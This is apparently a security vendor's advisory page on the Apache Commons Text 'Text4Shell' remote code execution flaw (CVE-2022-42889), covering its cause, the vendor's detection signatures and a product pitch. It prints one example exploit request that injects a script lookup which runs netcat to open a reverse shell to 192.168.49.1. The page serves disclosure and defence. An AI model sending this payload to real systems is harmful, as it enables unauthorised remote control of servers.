top of page

Apache Commons Text 'javascript' Remote Code Execution (Text4Shell) (CVE-2022-42889)



Application Details

Apache Commons Text is a library focused on algorithms working on strings. It performs text operations such as escaping, calculating string differences, and substituting placeholders in text with values looked up through interpolators.


Vulnerability

Apache Commons Text could allow a remote attacker to execute arbitrary code on the system, caused by an insecure interpolation defaults flaw.


Identification

By sending a specially crafted input, an attacker could exploit this vulnerability to execute arbitrary code on the system. Below is an example of a possible payload:


GET /text4shell/attack?search=${script:javascript:java.lang.Runtime.getRuntime().exec('nc 192.168.49.1 9090 -e /bin/sh')}

Detection

By creating several traffic files and matching rules, we are able to detect attempts to perform variations of remote code execution on an affected system.


Coverage

Idappcom have created signatures 8023210-8023213 along with traffic files for this vulnerability.


References


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional

留言


bottom of page